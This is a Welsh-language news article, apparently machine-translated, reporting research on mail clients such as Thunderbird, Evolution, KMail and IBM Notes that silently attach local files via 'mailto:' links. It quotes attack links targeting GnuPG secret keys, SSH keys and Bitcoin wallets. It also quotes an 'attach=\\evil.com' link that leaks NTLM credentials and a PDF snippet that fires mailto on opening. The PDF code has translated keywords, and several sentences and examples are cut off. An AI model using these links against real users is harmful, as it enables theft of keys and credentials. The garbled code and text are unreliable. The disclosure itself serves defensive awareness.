Ymchwilwyr o Brifysgol Ruhr Bochum (yr Almaen) () ymddygiad cleientiaid post wrth brosesu cysylltiadau “mailto:" gyda pharamedrau uwch. Roedd pump o'r ugain cleient e-bost a archwiliwyd yn agored i ymosodiad a oedd yn dylanwadu ar amnewid adnoddau gan ddefnyddio'r paramedr “atodi”. Roedd chwe chleient e-bost ychwanegol yn agored i ymosodiad amnewid allwedd PGP ac S/MIME, ac roedd tri chleient yn agored i ymosodiad i echdynnu cynnwys negeseuon wedi'u hamgryptio.
Dolenni «" yn cael eu defnyddio i awtomeiddio agor cleient e-bost er mwyn ysgrifennu llythyr at y derbynnydd a nodir yn y ddolen. Yn ogystal â'r cyfeiriad, gallwch nodi paramedrau ychwanegol fel rhan o'r ddolen, megis testun y llythyr a thempled ar gyfer cynnwys nodweddiadol. Mae'r ymosodiad arfaethedig yn trin y paramedr “atodi”, sy'n eich galluogi i atodi atodiad i'r neges a gynhyrchir.
Roedd cleientiaid post Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) a Pegasus Mail yn agored i ymosodiad dibwys sy'n eich galluogi i atodi'n awtomatig unrhyw ffeil leol, a nodir trwy ddolen fel "mailto:?attach=path_to_file". Mae'r ffeil ynghlwm heb arddangos rhybudd, felly heb sylw arbennig, efallai na fydd y defnyddiwr yn sylwi y bydd y llythyr yn cael ei anfon gydag atodiad.
Er enghraifft, gan ddefnyddio dolen fel “mailto:[e-bost wedi'i warchod]&subject=Title&body=Testun&attach=~/.gnupg/secring.gpg" gallwch fewnosod allweddi preifat o GnuPG yn y llythyren. Gallwch hefyd anfon cynnwys waledi crypto (~/.bitcoin/wallet.dat), allweddi SSH (~/.ssh/id_rsa) ac unrhyw ffeiliau sy'n hygyrch i'r defnyddiwr. Ar ben hynny, mae Thunderbird yn caniatáu ichi atodi grwpiau o ffeiliau trwy fwgwd gan ddefnyddio lluniadau fel “attach=/tmp/*.txt”.
Yn ogystal â ffeiliau lleol, mae rhai cleientiaid e-bost yn prosesu dolenni i storfa rhwydwaith a llwybrau yn y gweinydd IMAP. Yn benodol, mae IBM Notes yn caniatáu ichi drosglwyddo ffeil o gyfeiriadur rhwydwaith wrth brosesu dolenni fel “attach=\\evil.com\dummyfile”, yn ogystal â rhyng-gipio paramedrau dilysu NTLM trwy anfon dolen i weinydd SMB a reolir gan yr ymosodwr (bydd y cais yn cael ei anfon gyda'r defnyddiwr paramedrau dilysu cyfredol).
Mae Thunderbird yn prosesu ceisiadau fel “attach=imap:///fetch>UID>/INBOX>1/” yn llwyddiannus, sy'n eich galluogi i atodi cynnwys o ffolderi ar y gweinydd IMAP. Ar yr un pryd, mae negeseuon sy'n cael eu hadalw o IMAP, wedi'u hamgryptio trwy OpenPGP ac S/MIME, yn cael eu dadgryptio'n awtomatig gan y cleient post cyn eu hanfon. Roedd datblygwyr Thunderbird am y broblem ym mis Chwefror ac yn y rhifyn mae'r broblem eisoes wedi'i datrys (mae canghennau Thunderbird 52, 60 a 68 yn parhau i fod yn agored i niwed).
Roedd hen fersiynau o Thunderbird hefyd yn agored i ddau amrywiad ymosodiad arall ar PGP ac S/MIME a gynigiwyd gan yr ymchwilwyr. Yn benodol, roedd Thunderbird, yn ogystal ag OutLook, PostBox, eM Client, MailMate a R2Mail2, yn destun ymosodiad amnewid allwedd, a achoswyd gan y ffaith bod y cleient post yn awtomatig yn mewnforio ac yn gosod tystysgrifau newydd a drosglwyddir mewn negeseuon S/MIME, sy'n caniatáu yr ymosodwr i drefnu amnewid allweddi cyhoeddus sydd eisoes wedi'u storio gan y defnyddiwr.
Mae'r ail ymosodiad, y mae Thunderbird, PostBox a MailMate yn agored iddo, yn trin nodweddion y mecanwaith ar gyfer cadw negeseuon drafft yn awtomatig ac yn caniatáu, gan ddefnyddio paramedrau mailto, i gychwyn dadgryptio negeseuon wedi'u hamgryptio neu ychwanegu llofnod digidol ar gyfer negeseuon mympwyol, gyda trosglwyddo'r canlyniad wedyn i weinydd IMAP yr ymosodwr. Yn yr ymosodiad hwn, trosglwyddir y ciphertext trwy'r paramedr “corff”, a defnyddir y tag “meta refresh” i gychwyn galwad i weinydd IMAP yr ymosodwr. Er enghraifft: ' '
I brosesu dolenni “mailto:" yn awtomatig heb ryngweithio â defnyddwyr, gellir defnyddio dogfennau PDF a ddyluniwyd yn arbennig - mae'r weithred OpenAction mewn PDF yn caniatáu ichi lansio'r triniwr mailto yn awtomatig wrth agor dogfen:
% PDF-1.5
1 0 gwrthrych
<< /Math /Catalog /Agored [2 0 R] >>
endobj
2 0 gwrthrych
<< /Math /Cam Gweithredu /S /URI/URI (mailto:?body=—— DECHRAU NEGES PGP ——[…])>>
endobj
Ffynhonnell: opennet.ru